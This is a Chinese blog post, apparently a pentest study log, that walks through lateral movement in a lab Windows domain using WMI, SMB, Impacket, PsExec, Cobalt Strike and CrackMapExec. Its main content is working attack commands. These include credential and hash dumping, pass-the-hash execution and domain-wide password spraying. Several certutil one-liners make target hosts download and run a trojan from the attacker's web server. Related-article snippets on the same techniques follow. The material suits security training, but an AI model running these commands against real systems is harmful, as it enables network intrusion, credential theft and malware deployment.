第129天:内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket

最新推荐文章于 2024-08-22 19:21:31 发布
最新推荐文章于 2024-08-22 19:21:31 发布
阅读量814 收藏 19
点赞数 22
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/140964722
版权

这里这个环境继续上一篇文章搭建的环境

案例一: 域横向移动-WMI-自带&命令&套件&插件

首先上线win2008

首先提权到system权限

wmic是windows自带的命令,可以通过135端口进行连接利用,只支持明文方式,优点是不用上传别的东西,缺点是无回显。

利用system权限抓取明文密码和hash密码

直接获得了域控管理员的账号密码

探测存活主机 

进一步的信息收集上一篇文章写过

win2008开启监听并生成木马上传到本地web服务器

wmic 

利用wmic命令去连接别的主机,让目标主机去下载木马

wmic /node:目标ip /user:账号 /password:密码 process call create "执行命令"
wmic /node:192.168.3.30 /user:administrator /password:admin@123 process call create "certutil -urlcache -split -f http://192.168.3.20/2.exe 2.exe"

连接成功一般只有这种显示

成功上传

让他执行

成功上线

缺点就是没有任何回显

cscript

项目地址:https://github.com/AA8j/SecTools/tree/main/wmiexec.vbs

特点是会反弹一个新的窗口就导致没有办法在cs当中去运行,类似反弹shell,并且得借助一个vbs文件,且不支持hash

在3.20(win2008主机)上运行

cscript //nologo wmiexec.vbs /shell 192.168.3.30 账号 密码
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator 123.com

弹过来的新窗口反弹的ip为3.30

wmiexec-impacket

下载地址

1、Py版:https://github.com/SecureAuthCorp/impacket
python atexec.py god/administrator:Admin12345@192.168.3.21 “ver”
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 “whoami”

2、Exe版:https://gitee.com/RichChigga/impacket-examples-windows

这种方式又拥有回显,又可以适配cs

生成代理节点

这里因为我是linux环境直接执行py文件,exe文件一个原理

wmiexec ./账号:密码@ip "命令"
wmiexec 域名/账号:密码@ip "命令"
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"

尝试使用域控的hash进行连接

wmiexec -hashes :hash值 (域名或者.)/账号@192.168.3.40 "whoami"

执行上线

proxychains4 python wmiexec.py -hashes :afffeba176210fa/administrator@192.168.3.40 "certutil -urlcache -split -f h c:/222.exe & c:/222.exe"

案例二:  域横向移动-SMB-自带&命令&套件&插件

利用的是smb开放的445端口

命令

项目地址:PsTools - Sysinternals | Microsoft Learn

psexe也是反弹一个cmd所以不能直接在cs当中运行

windows官方用法
psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd

这里因为我是linux系统所以我直接把文件拖入win2008进行运行,并且运行该文件的时候cmd权限必须为admin,这里也可以用socks代理执行,并且权限已经是system可以执行。

20执行获得30的cmd

套件

使用套件中的psexec

wmi套件中
psexec.py ./administrator:123.com@192.168.3.30
psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.30

套件当中还有一个smbexec.py文件

python smbexec.py ./administrator:123.com@192.168.3.40 
python smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 administrator@192.168.20.30

同样也是会弹出一个新的cmd会话

 

cs自带

先需要设置转发上线,因为内网不出网

选择域控密码,或者主机密码

域控上线

 利用psexec64+主机hash值上线win7

因为这里我所有主机都是一个密码,所以直接选这个,记得他会自动加上win2008的域,记得删除,然后就是提醒我们在内网渗透过程当中要尝试切换域内用户的登录方式,大部分会自动加上域

成功上线

案例三: 域横向移动-工具-Proxychains&CrackMapExec

这里proxychains我一直在用,不做过多介绍了

crackmapexec下载地址:(kali自带)GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networks

基本用法

探测存活主机

crackmapexec smb 192.168.3.10-40 #探测存活主机

密码喷射域登录

crackmapexec smb 192.168.3.10-40 -u jie -p 123.com

这里由于我没有把密码和主机进行绑定,所以域内所有主机都可以用这个密码登录

密码喷射本地登录

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth

密码喷射本地登录加执行命令

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth -x "whoami"

尝试上线,记得设置转发上线,ip需要设置为内网ip

 利用下面的命令下载web服务器中的木马,并尝试运行上线

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com -x "certutil -urlcache -split -f http://192.168.3.20/2.exe c:/zzzzz.exe & c:/zzzzz.exe"

 除了域控主机之外都上线了,切换域控密码喷射

高阶玩法

当收集到一台域内主机以后,可以尝试把收集到的密码,用户都写入字典当中

注意收集用户的时候不能用提权的账户,需要用域内账户

这里密码我基本上都是123.com

运行,这里注意要加一个参数,不然运行一个成功匹配后就不会继续往下运行

--continue-on-success

用字典密码去匹配

这个加continue参数好像只能够匹配密码,不能全上线,不加参数的话又指挥上线一个就掉了,不太懂了,可以匹配出来密码,用账号密码,一个一个去上线?

xiaojiesec
关注
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&WinRS命令&WinRM管理&RDP终端&密码喷射点&CrackMapExec
HACKONE的博客
06-23 96
如果端口开了,先使用ping 能ping通说明防火墙可能是关的,正向和反向都可以 如果是ping不通就是开的, 开的就要看winrm开没开。下载对应release,建立socks连接,设置socks代理,配置规则,调用!是一款可以不借助远程桌面GUI的情况下,通过RDP协议进行命令执行的程序。不加 --local-auth执行都是失败的 会访问域并且执行名利。主要参数:-u用户,-p密码,-H哈希值,-d指定域,-x执行命令。主要功能:多协议探针,字典设置,本地及域喷射,命令回显执行等。
内网渗透—横向移动&Wmi横移&Smb横移&CME&ProxyChains
2301_76227305的博客
08-07 925
以上便是本次横移的知识了。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
内网安全横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
今天是几号的博客
03-26 1216
在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic。这几个端口都是与文件共享和打印机共享有关的端口,而且在这几个端口上经常爆发很严重的漏洞。安装使用:Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它。
内网安全学习(三)---横向渗透
qi_SJQ_的博客
02-09 1074
横向 smb&wmi 明文或 hash 传递 1.前置知识: 知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码。 Windows2012以下版本安装KB2871997补丁,也会导致无法获取明文密码。 针对以上情况,我们提供了4种方式解决此类问题: 1.利用哈希hash传递(pth,ptk等)进行移动。 2.利用其他服务协议(SMB,WMI等)进行哈希移动。 3.利用注册表操作开启Wdigest Auth值进行获取。 4.利用工具或第三方平台(
129- 横向移动&Wmi&cscript&Smb&CrackMapExec&ProxyChains&Impacket
最新发布
DamnVanish的博客
08-22 713
横向移动-wmi-自带&命令&套件&插件
内网横向移动Wmi&Smb&CrackMapExec&ProxyChains&Impacket
剁椒鱼头没剁椒的博客
06-30 1156
Windows中的wmi是Windows管理工具,它是Windows操作系统中管理数据和操作的基础模块,并且wmic 是通过 135 端口进行利用,支持用户名明文或者 hash 的方式进行认证,同时该方法不会在目标日志系统留下痕迹。
内网安全横向传递攻击(SMB || WMI 明文或 hash 传递)
网络安全领域___专研者.
06-09 3002
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
内网安全-横向移动】基于SMB协议-PsExec
02-10 8870
横向移动-基于SMB协议】PsExec
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket_内网横移 代理工具
2401_84263434的博客
05-02 306
内部命令:(利用出网主机192.168.3.31上线后执行命令,密码明文传递通过验证,cmd命令执行)的方式进行认证,并且该方法不会在目标日志系统留下痕迹。端口进行利用,支持用户名明文或者。传递来远程执行,条件。
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1254
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
[原创]Ladon7.5大型内网渗透扫描器&Cobalt Strike
热门推荐
K8哥哥
11-10 1万+
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.5版本内置39个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密码爆破11种含数据
内网安全横向移动-Wmi-Smb-CME密码喷射
qq_55349490的博客
07-18 1302
已经获取到了webserver服务器的权限横向移动到其他域内主机。
内网安全WMI协议与SMB协议横向移动
qq_61553520的博客
08-24 2397
此外,SMB协议还经过不断的发展和改进,最新的版本是SMB3,它引入了更高的性能和安全性特性。它是在局域网(LAN)中广泛使用的一种协议,最初由IBM开发,后来由微软引入并逐渐发展为现代的SMB协议。WMI协议的主要目标是提供一种统一的接口,使系统管理员和开发人员能够通过编程方式获取和控制Windows操作系统的各种管理信息。通过WMI协议,可以访问和操作计算机的硬件、操作系统、网络、进程、服务等各个方面的信息。SMB协议的作用是允许计算机之间共享文件和资源,并提供对这些共享资源的访问和管理。
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
m0_65842464的博客
02-16 1595
内网环境中,主机192.168.3.31有外网网卡能出网,在取得该主机权限后上线,搭建web应用构造后门下载地址,利用该主机执行相关命令可以进行横向移动,通过传递命令其他主机也可访问下载主机192.168.3.31的后门并执行,从而拿下内网中更多不出网主机。前提:用户名密码明文或哈希值抓取1、内网安全-域信息收集&CS插件&Adfind&BloodHound-CSDN博客一、域横向移动-WMI-自带命令套件插件WMI是通过135端口进行利用,支持用户名明文或者hash。
内网横向移动常用方法总结
da_chuan_chuan的博客
04-27 4268
文章目录前言一、通过at&schtasks进行明文传递二、、atexec进行明文与HASH传递三、SMB 服务利用1、psexec工具传递2、smbexec工具传递四、WMI 服务利用1、wmic传递2、cscript传递3、wmiexec传递五、PTH横向传递攻击六、PTK横向传递攻击二、使用步骤1.引入库2.读入数据总结 前言 当我们拿下webshell后,若其服务器有内网环境,在进一步测试中就需要进行内网渗透测试,对于内网渗透测试的方法常用的为:基于口令的横向移动和基于漏洞的攻击。本文主要从基
内网渗透】域横向smb&wmi明文或hash传递
ssrf
03-07 1483
目录0x001 Procdump+Mimikatz配合获取用户信息0x002 无法获取明文密码解决方案1)hashcat暴力破解2)注册表操作开启Wdigest Auth值3)SMB服务协议进行哈希移动4)WMI服务利用-cscript,wmiexec,wmic 0x001 Procdump+Mimikatz配合获取用户信息 Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(该文件不可读),使用本地
SMB横向利用
weixin_30731305的博客
07-24 783
一.IPC作用 利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息 二.ipc$的利用条件 1.139,445端口开启。 ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,i...
内网渗透中wmic的使用
01-17 5173
简介 Windows Management Instrumentation (WMI) 是在基于 Windows 的操作系统上管理数据和操作的基础结构。您可以编写 WMI 脚本或应用程序来自动执行远程计算机上的管理任务,而且WMI 还向操作系统和产品的其他部分提供管理数据,例如 System Center Operations Manager(以前称为 Microsoft Operations Manager (MOM))或 Windows远程管理 ( WinRM )。–微软官方文档 WMI可以描述为一
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值